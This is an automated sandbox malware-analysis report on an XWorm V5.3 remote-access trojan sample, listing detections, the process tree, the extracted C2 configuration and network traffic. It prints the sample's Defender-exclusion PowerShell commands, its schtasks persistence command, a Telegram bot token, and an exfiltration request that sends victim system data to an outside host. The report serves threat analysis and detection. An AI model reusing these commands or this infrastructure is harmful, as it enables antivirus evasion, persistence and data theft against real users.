Edit tour

Windows Analysis Report
X2.exe

Overview

General Information

Sample name:	X2.exe
Analysis ID:	1430688
MD5:	f8c0512008daff966ef349e7178d1239
SHA1:	2a74048cf5009ab0f850e3992ffe7a453e3e18a5
SHA256:	b019a47dc528a7197129adec69ea6813c28e60884c267cd297524296861a9ed6
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Drops PE files with benign system names

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

X2.exe (PID: 1320 cmdline: "C:\Users\user\Desktop\X2.exe" MD5: F8C0512008DAFF966EF349E7178D1239)

powershell.exe (PID: 3064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1824 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 2884 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: F8C0512008DAFF966EF349E7178D1239)

explorer.exe (PID: 2096 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: F8C0512008DAFF966EF349E7178D1239)

explorer.exe (PID: 4040 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: F8C0512008DAFF966EF349E7178D1239)

explorer.exe (PID: 1088 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: F8C0512008DAFF966EF349E7178D1239)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "91.92.252.220"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "explorer.exe", "Version": "XWorm V5.3", "Telegram URL": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
X2.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
X2.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
X2.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
X2.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
X2.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9fd2:$s6: VirtualBox 0x9f30:$s8: Win32_ComputerSystem 0xadee:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xae8b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xafa0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa62a:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\explorer.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Roaming\explorer.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\explorer.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\explorer.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Roaming\explorer.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9fd2:$s6: VirtualBox 0x9f30:$s8: Win32_ComputerSystem 0xadee:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xae8b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xafa0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa62a:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.2546617770.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9dd2:$s6: VirtualBox 0x9d30:$s8: Win32_ComputerSystem 0xabee:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xac8b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xada0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa42a:$cnc4: POST / HTTP/1.1
00000003.00000002.2546617770.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: X2.exe PID: 1320	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: X2.exe PID: 1320	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.X2.exe.850000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.0.X2.exe.850000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.X2.exe.850000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.0.X2.exe.850000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9fd2:$s6: VirtualBox 0x9f30:$s8: Win32_ComputerSystem 0xadee:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xae8b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xafa0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa62a:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\X2.exe, ProcessId: 1320, TargetFilename: C:\Users\user\AppData\Roaming\explorer.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X2.exe", ParentImage: C:\Users\user\Desktop\X2.exe, ParentProcessId: 1320, ParentProcessName: X2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', ProcessId: 3064, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\explorer.exe, CommandLine: C:\Users\user\AppData\Roaming\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1060, ProcessCommandLine: C:\Users\user\AppData\Roaming\explorer.exe, ProcessId: 2884, ProcessName: explorer.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X2.exe", ParentImage: C:\Users\user\Desktop\X2.exe, ParentProcessId: 1320, ParentProcessName: X2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', ProcessId: 3064, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\explorer.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X2.exe, ProcessId: 1320, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\X2.exe, ProcessId: 1320, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\X2.exe", ParentImage: C:\Users\user\Desktop\X2.exe, ParentProcessId: 1320, ParentProcessName: X2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", ProcessId: 1824, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X2.exe", ParentImage: C:\Users\user\Desktop\X2.exe, ParentProcessId: 1320, ParentProcessName: X2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe', ProcessId: 3064, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 91.92.252.220 - Destination IP: 192.168.2.11

Timestamp:	04/24/24-02:55:00.396337
SID:	2852874
Source Port:	7000
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 91.92.252.220 - Destination IP: 192.168.2.11

Timestamp:	04/24/24-02:55:05.012569
SID:	2852870
Source Port:	7000
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.11 - Destination IP: 91.92.252.220

Timestamp:	04/24/24-02:55:04.716910
SID:	2855924
Source Port:	49727
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.11 - Destination IP: 91.92.252.220

Timestamp:	04/24/24-02:55:05.014301
SID:	2852923
Source Port:	49727
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: X2.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\explorer.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: X2.exe	Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "91.92.252.220"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "explorer.exe", "Version": "XWorm V5.3", "Telegram URL": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672"}
Source: X2.exe.1320.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage"}

Multi AV Scanner detection for domain / URL

Source: 91.92.252.220

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\explorer.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\explorer.exe	Virustotal: Detection: 66%			Perma Link

Multi AV Scanner detection for submitted file

Source: X2.exe	ReversingLabs: Detection: 83%
Source: X2.exe	Virustotal: Detection: 66%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\explorer.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: X2.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: X2.exe	String decryptor: 127.0.0.1,91.92.252.220
Source: X2.exe	String decryptor: 7000
Source: X2.exe	String decryptor: <123456789>
Source: X2.exe	String decryptor: <Xwormmm>
Source: X2.exe	String decryptor: XWorm V5.3
Source: X2.exe	String decryptor: explorer.exe
Source: X2.exe	String decryptor: %AppData%
Source: X2.exe	String decryptor: bc1q7p5qe345uqww9e4ut3nt08tu2lsgnvfsc40azt
Source: X2.exe	String decryptor: 0x797460dC66e416bead591be98635aaafB836b8e7
Source: X2.exe	String decryptor: TKojtDLFNx6pFPXDuM3QV6FivRUeQzyRWA
Source: X2.exe	String decryptor: 2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo
Source: X2.exe	String decryptor: 966649672

Source: X2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49713 version: TLS 1.2

Source: X2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 91.92.252.220:7000 -> 192.168.2.11:49727
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 91.92.252.220:7000 -> 192.168.2.11:49727
Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.11:49727 -> 91.92.252.220:7000
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.11:49727 -> 91.92.252.220:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 127.0.0.1
Source: Malware configuration extractor	URLs: 91.92.252.220

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: X2.exe, type: SAMPLE
Source: Yara match	File source: 3.0.X2.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.11:49727 -> 91.92.252.220:7000

Source: global traffic	HTTP traffic detected: GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ABCC62BF1F171CE9AAF13%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FS1PX1XW%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: THEZONEBG THEZONEBG

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ABCC62BF1F171CE9AAF13%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FS1PX1XW%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: X2.exe, 00000003.00000002.2546617770.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 0000000B.00000002.1706316876.00000196F256C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1706316876.00000196F25E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000D.00000002.2005047268.000001E864A81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m3
Source: X2.exe, explorer.exe.3.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000005.00000002.1385650086.000001C310070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1501820454.0000016D287CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1679683114.00000196E9E1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1368428617.000001C30022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1421117542.0000016D18988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1558079051.00000196D9FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: X2.exe, 00000003.00000002.2546617770.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1368428617.000001C300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1421117542.0000016D18761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1558079051.00000196D9DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1756450379.000001E84C351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1368428617.000001C30022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1421117542.0000016D18988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1558079051.00000196D9FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.1520289753.0000016D30F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
Source: powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1520289753.0000016D30FB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703721938.00000196F24EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2001436445.000001E8649BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000005.00000002.1368428617.000001C300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1421117542.0000016D18761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1558079051.00000196D9DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1756450379.000001E84C351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: X2.exe, 00000003.00000002.2546617770.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegrP
